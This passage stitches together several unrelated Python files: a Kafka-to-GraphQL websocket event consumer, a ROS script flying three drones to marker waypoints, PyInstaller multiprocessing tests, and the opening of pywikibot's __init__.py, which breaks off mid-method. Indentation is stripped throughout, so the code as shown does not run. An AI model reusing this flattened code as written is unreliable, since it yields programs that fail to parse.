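# Illustrative sketch (hypothetical field/label names): if the GraphQL type
# declares "children" as a GraphQLList field, rewrite_node wraps the single
# nested node in a list, e.g.
#   {"children": {"label": "Child", "id": 1}} -> {"children": [{...}]}
# Scalar and unknown fields are copied through unchanged.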
def pathtostring(path):
spath = ""
if path:
for pathitem in path:
# if "label" in pathitem and "source" in pathitem and "target" in pathitem:
spath = "(" + pathitem.get("source", {}).get("label") + " " + pathitem.get("source", {}).get("id") + " -> " + pathitem.get("label") + " -> " + pathitem.get("target", {}).get("label") + " " + pathitem.get("target", {}).get("id") + ") " + spath
return spath
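# Illustrative (hypothetical ids/labels): one hop renders as
#   pathtostring([{"label": "knows",
#                  "source": {"label": "Person", "id": "1"},
#                  "target": {"label": "Person", "id": "2"}}])
#   -> '(Person 1 -> knows -> Person 2) '
# Hops are prepended, so the most recent path item appears first.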
async def consume():
schemas = GFSGQLSchemas.instance()
consumer = AIOKafkaConsumer(
# kftopic1,
kftopic2,
bootstrap_servers=str(kafka_host) + ":" + str(kafka_port),
enable_auto_commit=True,
group_id=kfgroup,
auto_offset_reset='latest',
max_poll_records=5,
max_poll_interval_ms=3000000,
# session_timeout_ms=3000000,
# request_timeout_ms=3000000,
# connections_max_idle_ms=3000000
heartbeat_interval_ms=9000,
)
# Get cluster layout and join group `my-group`
await consumer.start()
try:
# Consume messages
async for msg in consumer:
message = json.loads(msg.value)
key = msg.key
#
# LINK EVENT message
#
# {
# "event": "create_link",
# "link": {
# "id": 1234,
# "label": "label",
# "source": {
# "id": 1235,
# "label": "label"
# },
# "target": {
# "id": 1236,
# "label": "label"
# }
# }
# }
#
# NODE EVENT message
#
# {
# "event": "create_node",
# "node": {
# "id": 1235,
# "label": "label"
# }
# }
namespace = message.get('namespace', None)
event = message.get('event', None)
chain = message.get('chain', [])
path = message.get('path', [])
origin = message.get('origin', {})
link = message.get('link', {})
node = message.get('node', {})
if not chain:
chain = []
if not path:
path = []
if link:
pass
elif node:
                # Set the origin. The origin should never change,
                # but it should be initialized to node if not set,
                # as this would be the original event.
# Make sure to copy so we get the unaltered version.
if not origin:
origin = node.copy()
nodeid = node.get('id', None)
nodelabel = node.get('label', None)
originid = origin.get('id', None)
originlabel = origin.get('label', None)
# logging.debug(" NODE EVENT: namespace: " + str(namespace))
# logging.debug(" NODE EVENT: event: " + str(event))
# logging.debug(" NODE EVENT: node id: " + str(nodeid))
# logging.debug(" NODE EVENT: node label: " + str(nodelabel))
logging.debug(" => EVENT: namespace: " + str(namespace) + ", event: " + str(event) + ", node: " + str(nodelabel) + " " + str(nodeid) + ", origin: " + str(originlabel) + " " + str(originid) + ", path: " + str(pathtostring(path)))
#
# Quick and dirty schema rectifier
# TODO: Quick schema gen with no resolvers
# I use this for resolving field cardinality
#
# schema = schemas.quickschema(namespace)
# node = rewrite_node(node, schema, schema.get_type(nodelabel))
# logging.debug({
# "namespace": str(namespace),
# "event": str(event),
# "id": str(nodeid),
# "label": str(nodelabel),
# "chain": chain,
# # "node":
# "node": node,
# "origin": origin,
# "path": path
# })
if nodeid and nodelabel:
# subject = schemas.subject(namespace, nodelabel)
subject = schemas.subject(namespace, event)
# if subject:
# subject.on_next(message)
if subject:
subject.on_next({
"namespace": str(namespace),
"event": str(event),
"chain": chain,
"id": str(nodeid),
"label": str(nodelabel),
# "node":
"node": node,
"origin": origin,
"path": path
})
    except Exception:
        # Log the failure; the finally block below stops the consumer
        # (leaving the group and autocommitting if enabled).
        logging.exception("Kafka consumer loop failed")
finally:
# Will leave consumer group; perform autocommit if enabled.
await consumer.stop()
# async def send_one():
# producer = AIOKafkaProducer(
# bootstrap_servers=str(kafka_host) + ":" + str(kafka_port)
# )
# # Get cluster layout and initial topic/partition leadership information
# await producer.start()
# try:
# # Produce message
# await producer.send_and_wait(kftopic1, b"Super message")
# finally:
# # Wait for all pending messages to be delivered or expire.
# await producer.stop()
def __start_background_loop(thing):
def run_forever(thing):
# RuntimeError: There is no current event loop in thread 'Thread-1'.
# loop = asyncio.get_event_loop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
result = loop.run_until_complete(thing)
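        # run_until_complete() blocks this worker thread for the lifetime
        # of `thing` (here: the Kafka consume() coroutine), so the
        # Flask/gevent server below keeps the main thread.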
thread = threading.Thread(target=run_forever, args=(thing,))
thread.start()
# Python 3.7
# asyncio.run(consume())
# asyncio.run(send_one())
# Python 3.6
# AttributeError: module 'asyncio' has no attribute 'run'
# loop = asyncio.get_event_loop()
# result = loop.run_until_complete(consume())
__start_background_loop(consume())
logging.debug(str(listen_addr))
logging.debug(int(listen_port))
logging.debug(str(kafka_host))
logging.debug(str(kafka_port))
logging.debug(str(kftopic1))
logging.debug(str(kftopic2))
logging.debug(str(kfgroup))
# server = pywsgi.WSGIServer(('0.0.0.0', 5000), app, handler_class=WebSocketHandler)
server = pywsgi.WSGIServer((str(listen_addr), int(listen_port)), app, handler_class=WebSocketHandler)
server.serve_forever()
|
closest_goal3.py
|
#! /usr/bin/env python3
import rospy
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from control import *
from callback import get_drone_location
import threading  # used for the receive thread below; may also be re-exported by `from control import *`
N = 3
(goalx_d, goaly_d, d) = (dict(), dict(), dict())
goal = {}
goal[0] = {'x': [0.59, 0.07], 'y': [-0.016, 0.477]}
goal[1] = {'x': [0.00, -0.407], 'y': [-0.016, 0.003]}
goal[2] = {'x': [-0.59, 0.012], 'y': [-0.016, -0.41]}
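# goal[i]['x'][j], goal[i]['y'][j] is drone i's j-th waypoint; coordinates
# are in the AR-marker frame published on /ar_pose_marker (assumed).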
if __name__ == '__main__':
try:
        rospy.init_node('control_node', anonymous=False)
rate = rospy.Rate(10)
d[0] = ('192.168.11.39', 8889)
d[1] = ('192.168.11.49', 8889)
d[2] = ('192.168.11.41', 8889)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
sleep(1)
receiveThread = threading.Thread(target=receive)
receiveThread.daemon = True
receiveThread.start()
for i in range(0, N):
send("command", 0, d[i])
sleep(3)
for i in range(0, N):
send("takeoff", 0, d[i])
sleep(8)
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
send("down 20", 0, d[1])
send("up 30", 0, d[0])
sleep(3)
robot_in_pos = False
j = 0
count = 0
while not rospy.is_shutdown():
if count == 200:
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
sock1.close()
rospy.signal_shutdown('End of testing')
pass
else:
status = dict()
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
if not robot_in_pos:
AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
drone = get_drone_location(AlvarMsg)
if len(drone) == N:
drone = choose_goal(goal, drone)
print('\r\nDrone Position:')
for i in range(0, N):
print('drone_'+str(i+1)+' (x, y) = (%.2f, %.2f)' % (drone[i]['x'], drone[i]['y']))
goalx_d[i] = drone[i]['goal']['x']
goaly_d[i] = drone[i]['goal']['y']
print('')
sleep(1)
robot_in_pos = True
else:
robot_in_pos = False
count += 1
                        print(count)
else:
if j >= len(goalx_d[0]):
                        if all(value == 'Goal Position reached' for value in status.values()):
robot_in_pos = False
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
print("Mission completed successfully!")
sock1.close()
rospy.signal_shutdown('End of testing')
pass
else:
if len(drone) == N:
for i in range(0, N):
                                    status[i] = move_xy(goalx_d[i][len(goalx_d[i]) - 1], goaly_d[i][len(goaly_d[i]) - 1], drone[i]['x'], drone[i]['y'], d[i])
sleep(2)
else:
if len(drone) == N:
status = dict()
for i in range(0, N):
status[i] = move_xy(goalx_d[i][j], goaly_d[i][j], drone[i]['x'], drone[i]['y'], d[i])
sleep(2)
if all(value == 'Goal Position reached' for value in status.values()):
print(" ")
print ("Mission completed successfully!")
print("")
j += 1
sleep(3)
else:
count += 1
                            print(count)
except rospy.ROSInterruptException:
for i in range(0, N):
send("land", 0, d[i])
sleep(5)
sock1.close()
print('Simulation terminated')
pass
|
test_multiprocess.py
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright (c) 2005-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
# ----------------------------------------------------------------------------
# Library imports
# ---------------
import os
import sys
import pytest
# Local imports
# -------------
from PyInstaller.compat import is_win
from PyInstaller.utils.tests import importorskip, skipif
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess(pyi_builder):
pyi_builder.test_script('pyi_multiprocess.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_forking(pyi_builder):
pyi_builder.test_script('pyi_multiprocess_forking.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_pool(pyi_builder):
pyi_builder.test_script('pyi_multiprocess_pool.py')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('spawn')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@skipif(is_win, reason='fork is not available on windows')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_fork_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('fork')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@skipif(is_win, reason='forkserver is not available on windows')
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_forkserver_semaphore(pyi_builder, capfd):
pyi_builder.test_source("""
import sys
from multiprocessing import set_start_method, Process, Semaphore
from multiprocessing import freeze_support
from multiprocessing.util import log_to_stderr
def test(s):
s.acquire()
print('In subprocess')
s.release()
if __name__ == '__main__':
log_to_stderr()
freeze_support()
set_start_method('forkserver')
print('In main')
sys.stdout.flush()
s = Semaphore()
s.acquire()
proc = Process(target=test, args = [s])
proc.start()
s.release()
proc.join()
""")
out, err = capfd.readouterr()
# Print the captured output and error so that it will show up in the test output.
sys.stderr.write(err)
sys.stdout.write(out)
expected = ["In main", "In subprocess"]
assert os.linesep.join(expected) in out
for substring in expected:
assert out.count(substring) == 1
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_process(pyi_builder, capfd):
# Test whether this terminates, see issue #4865
pyi_builder.test_source("""
import sys, time
import multiprocessing as mp
def test():
time.sleep(1)
print('In subprocess')
print(sys.argv)
mp.freeze_support()
mp.set_start_method('spawn')
print('In main')
proc = mp.Process(target=test)
proc.start()
proc.join()
""")
@importorskip('multiprocessing')
@pytest.mark.timeout(timeout=60)
def test_multiprocess_spawn_pool(pyi_builder, capfd):
# Test whether this terminates, see issue #4865
pyi_builder.test_source("""
import sys, time
import multiprocessing as mp
def test(s):
time.sleep(1)
print(s)
print(sys.argv,)
mp.freeze_support()
mp.set_start_method('spawn')
print('In main')
with mp.Pool() as p:
p.map(test, 'in pool')
""")
|
__init__.py
|
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
import atexit
import datetime
import math
import re
import threading
import time
from contextlib import suppress
from decimal import Decimal
from queue import Queue
from typing import Optional, Union
from urllib.parse import urlparse
from warnings import warn
from pywikibot.__metadata__ import (
__copyright__, __description__, __download_url__, __license__,
__maintainer__, __maintainer_email__, __name__, __url__, __version__)
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.backports import cache, removesuffix
from pywikibot.bot import (
input, input_choice, input_yn, handle_args, show_help, ui,
calledModuleName, Bot, CurrentPageBot, WikidataBot,
)
from pywikibot.bot_choice import (
QuitKeyboardInterrupt as _QuitKeyboardInterrupt,
)
from pywikibot import config2 as config
from pywikibot.data.api import UploadWarning
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
BadTitle, CaptchaError, CascadeLockedPage, CircularRedirect,
CoordinateGlobeUnknownException, EditConflict, Error, FatalServerError,
InterwikiRedirectPage, InvalidTitle, IsNotRedirectPage, IsRedirectPage,
LockedNoPage, LockedPage, NoCreateError, NoMoveTarget, NoPage, NoSuchSite,
NoUsername, NoWikibaseEntity, OtherPageSaveError, PageCreatedConflict,
PageDeletedConflict, PageNotSaved, PageRelatedError, PageSaveRelatedError,
SectionError, Server414Error, Server504Error, ServerError,
SiteDefinitionError, SpamblacklistError, TitleblacklistError,
UnknownExtension, UnknownFamily, UnknownSite, UnsupportedPage,
WikiBaseError,
)
from pywikibot.family import AutoFamily, Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical, debug, error, exception, log, output, stdout, warning
)
from pywikibot.site import BaseSite, DataSite, APISite, ClosedSite
from pywikibot.tools import (
classproperty,
deprecate_arg as _deprecate_arg,
normalize_username,
MediaWikiVersion as _MediaWikiVersion,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
redirect_func,
)
from pywikibot.tools.formatter import color_format
__all__ = (
'__copyright__', '__description__', '__download_url__', '__license__',
'__maintainer__', '__maintainer_email__', '__name__',
'__url__', '__version__',
'BadTitle', 'Bot', 'calledModuleName', 'CaptchaError', 'CascadeLockedPage',
'Category', 'CircularRedirect', 'Claim', 'config', 'Coordinate',
'CoordinateGlobeUnknownException', 'critical', 'CurrentPageBot', 'debug',
'EditConflict', 'error', 'Error', 'exception', 'FatalServerError',
'FilePage', 'handle_args', 'html2unicode', 'input',
'input_choice', 'input_yn', 'InterwikiRedirectPage', 'InvalidTitle',
'IsNotRedirectPage', 'IsRedirectPage', 'ItemPage', 'Link', 'LockedNoPage',
'LockedPage', 'log', 'NoCreateError', 'NoMoveTarget', 'NoPage',
'NoSuchSite', 'NoUsername', 'NoWikibaseEntity', 'OtherPageSaveError',
'output', 'Page', 'PageCreatedConflict', 'PageDeletedConflict',
'PageNotSaved', 'PageRelatedError', 'PageSaveRelatedError', 'PropertyPage',
'_QuitKeyboardInterrupt', 'SectionError', 'Server414Error',
'Server504Error', 'ServerError', 'showDiff', 'show_help',
'Site', 'SiteDefinitionError', 'SiteLink', 'SpamblacklistError', 'stdout',
'Timestamp', 'TitleblacklistError', 'translate', 'ui', 'unicode2html',
'UnknownExtension', 'UnknownFamily', 'UnknownSite', 'UnsupportedPage',
'UploadWarning', 'url2unicode', 'User', 'warning', 'WbGeoShape',
'WbMonolingualText', 'WbQuantity', 'WbTabularData', 'WbTime', 'WbUnknown',
'WikiBaseError', 'WikidataBot',
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
passed provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.server_time() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep: str = 'T') -> str:
"""ISO8601 format string.
@param sep: one-character separator, placed between the date and time
@return: ISO8601 format string
"""
assert len(sep) == 1
return '%Y-%m-%d{0}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep: str = 'T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
@param ts: ISO 8601 timestamp or a Timestamp object already
@type ts: str or Timestamp
@param sep: one-character separator, placed between the date and time
@return: Timestamp object
@rtype: Timestamp
"""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super().__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
def __sub__(self, other):
"""Perform subtraction, returning a Timestamp instead of datetime."""
newdt = super().__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
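# Usage sketch for Timestamp (illustrative):
#     >>> ts = Timestamp.fromISOformat('2021-03-01T12:30:00Z')
#     >>> ts.totimestampformat()
#     '20210301123000'
#     >>> str(ts + datetime.timedelta(days=1))
#     '2021-03-02T12:30:00Z'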
class Coordinate(_WbRepresentation):
"""Class for handling and storing Coordinates."""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat: float, lon: float, alt=None,
precision: Optional[float] = None,
globe: Optional[str] = None, typ: str = '',
name: str = '', dim: Optional[int] = None,
site: Optional[DataSite] = None, globe_item=None,
primary: bool = False):
"""
Represent a geo coordinate.
@param lat: Latitude
@param lon: Longitude
@param alt: Altitude? TODO FIXME
@param precision: precision
@param globe: Which globe the point is on
@param typ: The type of coordinate point
@param name: The name
@param dim: Dimension (in meters)
@param site: The Wikibase site
@param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
@type globe_item: pywikibot.ItemPage or str
@param primary: True for a primary set of coordinates
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
self.primary = primary
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownException(
'%s is not supported in Wikibase yet.'
% self.globe)
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self) -> dict:
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
@return: Wikibase JSON
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data: dict, site: DataSite):
"""
Constructor to create an object from Wikibase's JSON output.
@param data: Wikibase JSON
@param site: The Wikibase site
@rtype: Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self) -> Optional[float]:
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
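    # Worked example (illustrative): dim = 1000 m at the equator gives
    # precision = degrees(1000 / 6378137) ~= 0.00898 degrees; at latitude
    # 60 deg the same dim gives ~= 0.0180 degrees, since the east-west
    # radius shrinks by cos(60 deg).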
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self) -> Optional[int]:
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get::
dim = math.radians(
precision)*radius*math.cos(math.radians(self.lat))
But this is not valid, since it returns a float value for dim which is
an integer. We must round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
def get_globe_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
@param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
@param lazy_load: Do not raise NoPage if ItemPage does not exist.
@return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self,
year: Optional[int] = None,
month: Optional[int] = None,
day: Optional[int] = None,
hour: Optional[int] = None,
minute: Optional[int] = None,
second: Optional[int] = None,
precision: Union[int, str, None] = None,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
@param year: The year as a signed integer of between 1 and 16 digits.
@param month: Month
@param day: Day
@param hour: Hour
@param minute: Minute
@param second: Second
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = year
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site %s has no data repository' % Site())
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "%s"' % precision)
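    # Illustrative precision autodetection:
    #   WbTime(year=2021)                      -> precision 9  ('year')
    #   WbTime(year=2021, month=3)             -> precision 10 ('month')
    #   WbTime(year=2021, month=3, day=1,
    #          hour=12)                        -> precision 12 ('hour')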
@classmethod
def fromTimestr(cls,
datetimestr: str,
precision: Union[int, str] = 14,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
        * The year is always signed and has between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
@param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '%s'" % datetimestr)
t = match.groups()
return cls(int(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision: Union[int, str] = 14,
before: int = 0, after: int = 0,
timezone: int = 0, calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
@param timestamp: Timestamp
@type timestamp: pywikibot.Timestamp
@param precision: The unit of the precision of the time.
@param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
@param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
@param timezone: Timezone information in minutes.
@param calendarmodel: URI identifying the calendar model
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso: bool = False) -> str:
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
@param force_iso: whether the output should be forced to ISO 8601
@return: Timestamp in a format resembling ISO 8601
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self) -> Timestamp:
"""
Convert the data to a pywikibot.Timestamp.
@raises ValueError: instance value cannot be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
@return: Wikibase JSON
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
@param wb: Wikibase JSON
@param site: The Wikibase site
@rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site: DataSite) -> bool:
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site item is supplied it raises a warning and returns True.
@param site: The Wikibase site
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value: str) -> Optional[Decimal]:
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
@param value: decimal number to convert
"""
